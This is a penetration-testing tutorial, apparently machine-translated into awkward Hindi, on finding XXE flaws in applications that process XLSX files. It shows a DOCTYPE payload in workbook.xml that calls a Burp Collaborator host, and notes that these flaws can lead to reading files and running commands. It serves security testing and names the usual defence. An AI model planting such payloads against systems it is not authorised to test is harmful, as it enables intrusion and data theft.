Xxe स्प्रेडशीट शोषण । एक्सएलएसएक्स

एक्सएमएल एक्सएमएल एक्सटीशनल एंटिटी (XXE) की असुरक्षा यह है कि एक्सएमएल डॉक्युमेंट स्ट्रक्चर को पार्स करते समय, जिसे डॉक्युमेंट टाइप डेफिनेशन (डीटीडी) कहा जाता है, तो आपको अपनी एक्सएमएल संस्थाओं को परिभाषित करने की अनुमति है। सर्वर-साइड एक्सएमएल प्रोसेसिंग इंजन और पर्यावरण के विन्यास के आधार पर, इस प्रकार की भेद्यता का अलग तरह से दोहन किया जा सकता है। सिस्टम पर लिस्टिंग निर्देशिका के साथ शुरू, आवेदन और सिस्टम फ़ाइलों को पढ़ने, आवेदन उपयोगकर्ता का एक एन्क्रिप्टेड पासवर्ड प्राप्त करने के साथ ही सर्वर या क्रियांवित प्रणाली आज्ञाओं के लिए फ़ाइलों को स्थानांतरित ।

इस प्रकार की भेद्यता का क्लासिक परिदृश्य यह मानता है कि हम अपने शरीर में एक अनुरोध से निपट रहे हैं, जिसके लिए हम अपनी इकाई की परिभाषाओं के लिए जिम्मेदार हिस्सा जोड़ते हैं। हालांकि, यह भेद्यता एक एप्लिकेशन से निपटने के दौरान भी हो सकती है जो किसी भी तरह एक्सेल फ़ाइलों को संसाधित करती है। XLSX, वर्ड । डॉक्स या पावरपॉइंट । पीपीपीटीएक्स। हम इस तथ्य के ऋणी हैं कि इस प्रकार की फाइलें जो ओओक्सएमएल-अनुपालन हैं, इस प्रकार वे बस कई फाइलें पैक की जाती हैं। एक्सएमएल।

त्वरित हमले परिदृश्य इस प्रकार है:

  1. एक नया खाली दस्तावेज बनाएं । एक्सएलएसएक्स। यह इस उद्देश्य के लिए "गूगल शीट" का उपयोग कर सकते हैं।
गूगल शीट

2. ओपन बर्प सुइट प्रोफेशनल-> बर्प-> बर्प सहयोगी क्लाइंट । इसके बाद "क्लिपबोर्ड की कॉपी" बटन पर क्लिक करें। मेरे मामले में, सर्वर का पता इस प्रकार था – lpexqn6l2qamcw74mgerllgpzg56tv.burpcollaborator.net।

वैकल्पिक रूप से, यदि आपके पास बाहरी आईपी है, तो आप अजगर में एक साधारण HTTP सर्वर का उपयोग कर सकते हैं – "पायथन3 -m http.सर्वर 8080"।

3. डाउनलोड की गई फाइल को 7ज़िप से खोलें।

एक्सएलएक्सएस संस्करण

3. निम्नलिखित कोड जोड़कर "एक्सएल" निर्देशिका में "वर्कबुक.xml" फ़ाइल को संपादित करें (निश्चित रूप से, सर्वर पते को अपने साथ बदलें):

<!DOCTYPE root [ <!ENTITY % xxe SYSTEM "http://lpexqn6l2qamcw74mgerllgpzg56tv.burpcollaborator.net/"> % xxe; ]>

नोट- मैंने जिन अनुप्रयोगों का परीक्षण किया है उनमें से एक में, भेद्यता xxe को "[Content_Types] .xml" संपादित करने के बाद पता चला है, इसलिए यह इस फ़ाइल की जांच करने लायक है।

वर्कबुक संस्करण.xml
वर्कबुक संस्करण.xml

4. अपने बदलावों को सहेजें और उस ऐप में फाइल अपलोड करें, जिसे आप टेस्ट कर रहे हैं।

5. अब किसी भी अनुरोध के लिए सहयोगी ग्राहक की जांच करें:

बर्प सहयोगी ग्राहक

6. 🙂 का आनंद लें – आपने परीक्षण किए गए आवेदन में xxe भेद्यता की पुष्टि की है और आप इसके उपयोग को आगे बढ़ाने के लिए आगे बढ़ सकते हैं।

XXE के खिलाफ एक आम सुरक्षा सुविधा एक्सएमएल पार्सर में बाहरी संस्थाओं की लोडिंग को पूरी तरह से अक्षम करना है।

Chcesz wiedzieć więcej?

Zapisz się i bądź informowany o nowych postach (zero spamu!).
Dodatkowo otrzymasz, moją prywatną listę 15 najbardziej przydatnych narzędzi (wraz z krótkim opisem), których używam przy testach penetracyjnych.

Nigdy nie podam, nie wymienię ani nie sprzedam Twojego adresu e-mail. W każdej chwili możesz zrezygnować z subskrypcji.

Bookmark the permalink.

Podziel się swoją opinią na temat artykułu